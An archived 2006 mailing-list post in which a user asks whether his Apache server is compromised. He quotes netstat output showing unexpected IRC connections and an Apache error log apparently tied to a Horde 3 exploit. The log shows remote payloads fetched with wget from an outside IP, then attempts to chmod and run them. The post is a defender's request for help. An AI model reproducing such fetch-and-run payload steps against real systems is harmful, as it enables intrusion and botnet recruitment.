[H-GEN] apache2 compromised or just attempts?
Troy Piggins
troy at piggo.com
Sun May 28 20:21:47 EDT 2006
* Troy Piggins <troy at piggo.com> :
>
[snip]
> Yesterday the web server stopped working. It is not showing up in 'pstree'.
> Look at netstat and this is the (worrying) output:
>
> -----8<-----
> Active Internet connections (w/o servers)
> Proto Recv-Q Send-Q Local Address Foreign Address State
> tcp 0 0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
> tcp 0 0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
> tcp 0 0 10.1.1.11:43404 zagreb.hr.eu.under:ircd ESTABLISHED
> tcp 0 0 10.1.1.11:43411 zagreb.hr.eu.under:ircd ESTABLISHED
> tcp 0 0 10.1.1.11:55893 lemming.euronet.nl:ircd ESTABLISHED
> tcp 0 0 10.1.1.11:47631 checkip.chi.dyndns.:www CLOSE_WAIT
> tcp 0 0 localhost.localdo:32769 localhost.localdo:51625 ESTABLISHED
> tcp 0 0 10.1.1.11:33570 oslo2.no.eu.undern:6669 ESTABLISHED
> tcp 1 0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
> [snip]
> -----8<-----
>
> 10.1.1.11 is my ubuntu machine's ip address of it's wireless card connection
> to my wireless modem/router.
>
> What the hell are those ircd entries? Am I compromised? What is my next
> step?
I've since found out that it's a horde 3 vulnerability - well that's the likely
candidate at the moment.
I've uninstalled it, but how do I stop those irc servers.
> [1] extract of /var/log/apache1/error.log.4.gz
>
> -----8<-----
> [Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script
> '/var/www/thisd
> oesnotexistahaha.php' not found or unable to stat
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist:
> /
> var/www/horde-cvs
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist:
> /
> var/www/pub/horde-cvs
> --20:41:57-- http://81.58.26.26/libsh/ping.txt
> => `ping.txt'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 358 [text/plain]
> ping.txt: Permission denied
>
> Cannot write to `ping.txt' (Permission denied).
> mv: cannot stat `ping.txt': No such file or directory
> perl: warning: Setting locale failed.
> perl: warning: Please check that your locale settings:
> LANGUAGE = "en_US",
> LC_ALL = (unset),
> LANG = "en_US"
> are supported and installed on your system.
> perl: warning: Falling back to the standard locale ("C").
> Can't open perl script "temp2006": No such file or directory
> --20:41:57-- http://81.58.26.26/libsh/ping
> => `ping'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 15,808 (15K) [text/plain]
> ping: Permission denied
>
> Cannot write to `ping' (Permission denied).
> chmod: invalid mode string: `x'
> sh: ./ping: No such file or directory
> sh: curl: command not found
> -----8<-----
--
Troy Piggins
,-o Ubuntu v5.10 (Breezy Badger): kernel 2.6.12-10-k7,
o ) postfix 2.2.4, procmail 3.22, mutt 1.5.11i,
`-o slrn 0.9.8.1/rt (score_color patch), vim 7.0
More information about the General
mailing list